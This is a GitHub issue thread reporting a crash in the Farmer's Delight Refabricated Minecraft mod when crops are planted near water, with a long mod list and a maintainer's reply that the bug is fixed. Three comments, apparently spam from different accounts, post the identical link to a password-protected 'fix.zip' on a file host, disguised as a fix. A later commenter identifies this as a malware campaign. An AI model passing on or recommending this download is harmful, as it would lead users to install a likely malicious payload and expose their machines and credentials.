### ISSUE TITLE
Planted Crops Cause Crash

### ISSUE THREAD

**Issue by Tenuuu** [MehVahdJukaar/FarmersDelightRefabricated#69]
### Minecraft version

1.21

### Farmer's Delight version

2.1.5

### Fabric Loader version

0.16.2

### Fabric API version

0.102.0+ 1.21

### Description

When planting a tomato crop and a cabbage crop (unknown if the specific crops cause this crash) next to water, the game will crash 

### Steps to reproduce

1. Plant FD crops
2. Place water
3. Wait for crash

### Mod list

  [✔] abandoned-villages-v1.0.1
  [✔] accessories_tclayer-3.10.0-beta.7+1.21
  [✔] accessories-fabric-1.0.0-beta.30+1.21
  [✔] ACE_mc1.20.6-3.1.1
  [✔] advancementinforeloaded-0.4.2-1.21
  [✔] alternate-current-mc1.21-1.8.2
  [✔] AmbientSounds_FABRIC_v6.0.5_mc1.21
  [✔] Amplified_Nether_1.21_v1.2.5 (1)
  [✔] antique-atlas-2.9.17+1.21
  [✔] architectury-13.0.6-fabric
  [✔] asahi-1.1.0+1.20.4
  [✔] auditory-0.0.7-1.21
  [✔] balm-fabric-1.21.1-21.0.18
  [✔] better-clouds-1.7.1+1.21
  [✔] betterdays-1.21.1-3.1.0.7-FABRIC
  [✔] better-enchanted-books-1.21-2.1.0
  [✔] BetterF3-11.0.1-Fabric-1.21
  [✔] betterstats-3.13.2+fabric-1.21
  [✔] blossom-lib-2.5.8+1.21
  [✔] blossom-pvp-2.0.4+1.21
  [✔] bobby-5.2.4+mc1.21
  [✔] bound!-1.1
  [✘] burninthesun-fabric-1.21-1.10.0.jar (disabled)
  [✔] c2me-fabric-mc1.21-0.2.0+alpha.11.109
  [✘] CameraOverhaul-1.4.1-fabric-universal.jar (disabled)
  [✘] carpet-extra-1.21-1.4.148.jar (disabled)
  [✘] carpet-tis-addition-v1.63.1-mc1.21.1.jar (disabled)
  [✔] cave_dust-3.0.0
  [✔] chat_heads-0.12.13-fabric-1.21
  [✔] cheaper-maps-1.2
  [✔] cherishedworlds-fabric-10.0.2+1.21.1
  [✘] chunksfadein-1.0.1-1.21.jar (disabled)
  [✘] clifftree-1.7.jar (disabled)
  [✔] cloth-config-15.0.130-fabric
  [✔] cloth-gamerules-1.1.1+1.19.4
  [✔] collective-1.21.1-7.84
  [✘] Combatify-1.21-1.2.0-Fabric.jar (disabled)
  [✘] Continents_1.21_v1.1.5.jar (disabled)
  [✔] continuebutton-1.2.5
  [✔] continuity-3.0.0-beta.5+1.21
  [✔] Controlify-2.0.0-beta.14+1.21-fabric
  [✔] Controlling-fabric-1.21-18.0.4
  [✔] crawl-0.13.0
  [✔] CreativeCore_FABRIC_v2.12.6_mc1.21
  [✔] cristellib-fabric-1.2.7
  [✔] Crops-Love-Rain-2.1.1
  [✔] cubes-without-borders-2.1.1+1.21
  [✔] CutThrough-v21.0.0-1.21-Fabric
  [✔] darkness-fabric-1.1.0-mc1.21
  [✔] daylight-mobs-reborn-1.2.9
  [✔] Debugify-1.21+1.0
  [✔] dismountentity-1.21.1-3.5
  [✘] DistantHorizons-2.2.0-a-1.21.1-neo-fabric.jar (disabled)
  [✔] door_knocking-1.0.1+1.21-fabric
  [✔] doors-closed-1.0.0+1.19.4
  [✔] doubledoors-1.21.1-5.9
  [✔] dungeons-and-taverns-ancient-city-overhaul-v2
  [✔] dungeons-and-taverns-desert-temple-overhaul-v1.1
  [✔] dungeons-and-taverns-jungle-temple-overhaul-v1.1
  [✔] dungeons-and-taverns-nether-fortress-overhaul-v2.1
  [✔] dungeons-and-taverns-ocean-monument-overhaul-v1.1
  [✔] dungeons-and-taverns-pillager-outpost-overhaul-v2.2
  [✔] dungeons-and-taverns-stronghold-rework-v2.1
  [✔] dungeons-and-taverns-swamp-hut-overhaul-v2
  [✔] dungeons-and-taverns-v4.3
  [✔] dungeons-and-taverns-woodland-mansion-overhaul-v1.1
  [✔] dynamiccrosshair-8.1+1.21-fabric
  [✔] EasyAnvils-v21.0.3-1.21-Fabric
  [✔] EasyItemList-0.1.3-1.20.5
  [✔] eg_fix_horizontal_camera_lag-1.1.1-fabric-mc1.20.6
  [✔] elytra-rebalance-1.0.3+1.21
  [✔] emi-1.1.12+1.21+fabric
  [✘] enchantmentdisabler-2.0.0+1.21.jar (disabled)
  [✘] enderous-loot-v1.0.1.jar (disabled)
  [✔] enhanced_attack_indicator-1.0.4+1.21
  [✔] entity_model_features_fabric_1.21-2.2
  [✔] entity_sound_features_fabric_1.21-0.4
  [✔] entity_texture_features_fabric_1.21.1-6.2.1
  [✔] entityculling-fabric-1.6.7-mc1.21
  [✔] EquipmentCompare-1.21-fabric-1.3.12
  [✔] essential_1-3-4_fabric_1-21-1
  [✔] EuphoriaPatcher-0.3.4-fabric
  [✔] Explorify v1.6.1 f10-48
  [✔] explosive-enhancement-1.2.3-1.21.0
  [✔] fabric-api-0.102.0+1.21
  [✔] fabric-carpet-1.21-1.4.147+v240819
  [✔] fabric-language-kotlin-1.12.1+kotlin.2.0.20
  [✔] fabricskyboxes-0.7.4+mc1.21
  [✔] fallingleaves-1.16.2+1.21
  [✔] FarmersDelight-1.21-2.1.5+refabricated
  [✔] Favorita-0.5.1+1.21-fabric
  [✔] ferritecore-7.0.0-fabric
  [✘] Fog-fabric-1.3.1-1.21.jar (disabled)
  [✔] FoodEffectTooltips-1.1.1-1.21
  [✔] ForgeConfigAPIPort-v21.0.8-1.21-Fabric
  [✔] freecam-fabric-modrinth-1.3.0+mc1.21
  [✔] frost-2.0.3
  [✔] fsb-interop-1.4.0+mc1.21-build.54
  [✔] ftb-library-fabric-2100.1.4
  [✔] ftb-teams-fabric-2100.1.0
  [✔] fzzy_config-0.3.7+1.21
  [✘] Geophilic v3.1.1 f15-48.jar (disabled)
  [✔] GlitchCore-fabric-1.21-2.0.0.3
  [✔] globalpacks-fabric-1.21-21.0.0
  [✔] glowing-torchflower-1.20.3-1.1.0
  [✔] glow-up-1.1
  [✔] graves-3.4.3+1.21
  [✔] guiclock-1.21.1-4.6
  [✔] guicompass-1.21.1-4.8
  [✔] hardcorerevival-fabric-1.21-21.0.3
  [✔] health-indicator-4
  [✔] healthindicatortxf-1.21.1-1.2.5-fabric
  [✔] Hearths v1.0.1 f12-48
  [✔] heartymeals-1.21-r2
  [✔] hide-arrows-v1.3
  [✔] Highlighter-1.21-fabric-1.1.11
  [✔] highlight-fabric-1.21-3.0.0
  [✔] HorseBuff-1.21-2.1.8
  [✔] hungrier-1.2
  [✔] Iceberg-1.21-fabric-1.2.5
  [✔] idwtialsimmoedm-0.3.2+1.21
  [✔] ImmediatelyFast-Fabric-1.2.20+1.21.1
  [✔] ImmersiveThunder-1.21+1.2.2
  [✔] ImmersiveUI-FABRIC-0.2.2
  [✘] incapacitated-fabric-1.21-1.7.2.jar (disabled)
  [✔] increased-rails-recipe-output-1.2
  [✔] indium-1.0.35+mc1.21
  [✔] infinite-music-0.4.3
  [✘] inventory-tabs-1.4.0+1.21.jar (disabled)
  [✔] iris-1.7.3+mc1.21
  [✔] ItemBorders-1.21-fabric-1.2.5
  [✔] itemflexer-1.3.2
  [✔] itemsstack-1.2.0
  [✔] ivespoken-2.2.2-fabric.1.21
  [✔] jakes-build-tools-1.5.2
  [✔] jamlib-fabric-1.0.11+1.21
  [✔] Jump-Sounds-1.4.3
  [✔] language-reload-1.6.1+1.21
  [✔] LegendaryTooltips-1.21-fabric-1.4.11
  [✔] liberty-villagers-mod-1.0.15+fabric+1.21
  [✔] Linkart-5.4.5-1.20.6-build.29
  [✘] lithium-fabric-mc1.21-0.13.0.jar (disabled)
  [✔] lithostitched-fabric-1.21-1.2.5a
  [✔] make_bubbles_pop-0.3.0-fabric-mc1.19.4-1.21
  [✔] mc-paint-1.3.1
  [✔] mobsonrails-1.0.0 fabric-1.20.5
  [✔] modelfix-1.21-1.6-fabric
  [✔] modernfix-fabric-5.19.1+mc1.21
  [✔] modmenu-11.0.2
  [✔] monsters-in-the-closet-1.0.3+1.21
  [✔] moremcmeta-1.21-4.4.7-fabric
  [✔] MouseTweaks-fabric-mc1.21-2.26
  [✔] MRU-1.0.2+1.21+fabric
  [✔] MusicNotification-fabric-mc1.21-2.1.0
  [✔] nadir-1.0.2
  [✔] NametagTweaks 1.21-fabric-1.3.4
  [✔] NBTac-FABRIC-1.21-1.3.3
  [✔] nightautoconfig-1.0.6-fabric.1.21
  [✔] no-enderman-grief-v.2.1.2
  [✔] noisium-fabric-2.3.0+mc1.21-1.21.1
  [✔] no-resource-pack-warnings-1.3.0
  [✔] notenoughanimations-fabric-1.7.5-mc1.21
  [✔] Nullscape_1.21_v1.2.7
  [✔] nvidium-0.2.9-beta
  [✔] nyfsspiders-fabric-1.21-2.3.1
  [✔] ObsidianUI-fabric-0.2.7+mc1.21
  [✔] OctoLib-FABRIC-0.4.2
  [✔] OmniCore-0.10.0+1.21-fabric
  [✔] optigui-2.3.0-beta.2+1.21
  [✔] Origins-1.13.0-alpha.6+mc.1.21.x
  [✔] owo-lib-0.12.11+1.21
  [✔] packrule-menus-2.0.1+1.21
  [✔] particle_core-0.2.4+1.21
  [✔] particular-1.1.1+1.21
  [✔] peek-fabric-1.21.1-1.3.5
  [✔] PickUpNotifier-v21.0.0-1.21-Fabric
  [✔] pingintablist-fabric-1.21-1.0.2
  [✔] Ping-Wheel-1.9.2-fabric-1.21.1
  [✔] plasmovoice-fabric-1.21-2.0.10
  [✔] polymer-bundled-0.9.9+1.21
  [✔] polytone-1.21-2.3.10-fabric
  [✔] pommel-held-items-1.0.0
  [✔] preferred-gamerules-1.1.0+1.19.4
  [✔] Prism-1.21-fabric-1.0.9
  [✔] puzzle-1.6.3+1.21
  [✔] PuzzlesLib-v21.0.23-1.21-Fabric
  [✔] pv-addon-soundphysics-1.0.1
  [✔] raised-fabric-1.21-4.0.0
  [✔] reeses_sodium_options-1.7.3+mc1.21
  [✔] refined-advancements-1.0.4a
  [✔] revampedphantoms-1.1.1-fabric
  [✔] rightclickharvest-fabric-4.3.1+1.21
  [✔] rsls-1.1.4
  [✔] RyoamicLights-fabric-0.2.11+mc1.21.1
  [✔] screenfx-1.4.2+1.21
  [✔] seamless-2.3.0-fabric-1.21.1
  [✔] Searchables-fabric-1.21-1.0.5
  [✔] selfcare-hive-1.0.2+1.20.5
  [✔] shifting-wares-2.2.2+1.21
  [✔] shiftingwares-villagerconfig-addon-1.0.1+1.20.6
  [✔] ShoulderSurfing-Fabric-1.21.1-4.3.1
  [✔] shulkerbox-fabric-1.21.1-2.0.5
  [✔] shulkerboxtooltip-fabric-5.0.4+1.21
  [✔] simplefog-1.6.0
  [✔] SlotCycler-v21.0.0-1.21-Fabric
  [✔] slotted-armor-hud-1.2.5
  [✔] smokesignals-1.1+1.21
  [✔] SnowUnderTrees-2.5.3+1.21
  [✔] sodiumcoreshadersupport-1.0.3
  [✔] sodium-extra-0.5.7+mc1.21
  [✔] sodium-fabric-0.5.11+mc1.21
  [✔] sodium-shadowy-path-blocks-3.4.0
  [✔] sound-physics-remastered-fabric-1.21.1-1.4.6
  [✔] Sounds-2.0.4+1.21+fabric
  [✔] spyglass_improvements-1.5.7+mc1.21+fabric
  [✔] Stackable Potions-fabric-1.21-1.0.0
  [✘] stamina-for-tweakers-1.3.2+1.21.jar (disabled)
  [✔] status-effect-bars-1.0.6
  [✔] Stony Cliffs for Lithostitched v1.1.2
  [✔] stretchy-leash-2.1.0+1.21
  [✘] Structory_1.21_v1.3.5.jar (disabled)
  [✔] stutterfix-mc1.21-0.2.3
  [✔] supermartijn642configlib-1.1.8-fabric-mc1.21
  [✔] tcdcommons-3.12.3+fabric-1.21
  [✔] TerraBlender-fabric-1.21-4.0.0.2
  [✔] TES-fabric-1.21-1.5.5
  [✔] Textile-0.5.2+1.21-fabric
  [✔] Textualizer-0.1.1+1.21-fabric
  [✔] TiltBreak-1.21-1.7FC
  [✔] trashslot-fabric-1.21-21.0.2
  [✔] treeharvester-1.21.1-9.1
  [✔] tru.e-ending-v1.1.2b
  [✔] viewboboptions-0.3.0+1.21
  [✔] villagebellrecipe-1.21.1-3.6
  [✔] villagerconfig-4.2.0+1.21
  [✔] villager-transportation-1.3.1
  [✘] vinurl-1.1.3.jar (disabled)
  [✔] visuality-0.7.7+1.21
  [✘] vivecraft-1.21-1.1.11-b5-fabric.jar (disabled)
  [✔] vmp-fabric-mc1.21-0.2.0+beta.7.165-all
  [✘] voicechat-fabric-1.21.1-2.5.20.jar (disabled)
  [✔] volumefix-1.2.0+1.21
  [✘] wakes-0.2.5+1.21.jar (disabled)
  [✔] watermedia-2.0.69
  [✔] wither-cage-fix-1.0.22+MC1.20-1.21
  [✔] yeetusexperimentus-fabric-87.0.0
  [✔] YetAnotherConfigLib-3.5.0+1.21-fabric

### Logs

https://mclo.gs/akI91br

### Minimal instance

- [ ] I have tested this on a minimal instance

### Performance and shader mods

- [X] I am using performance or shader mods

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Tenuuu** [comment]
???

**Comment by ChrysanthCow** [comment]
Hi, there's some malware being spread across github issues as of right now.

But if this is the tomato crop issue, it has been fixed.

**Comment by ChrysanthCow** [comment]
Hi, there's some malware being spread across github issues as of right now.

But if this is the tomato crop issue, it has been fixed.

Oh? Its a different one.

**Comment by ChrysanthCow** [comment]
Was already fixed in 1.2.6.
https://modrinth.com/mod/farmers-delight-refabricated/version/1.21-2.1.6
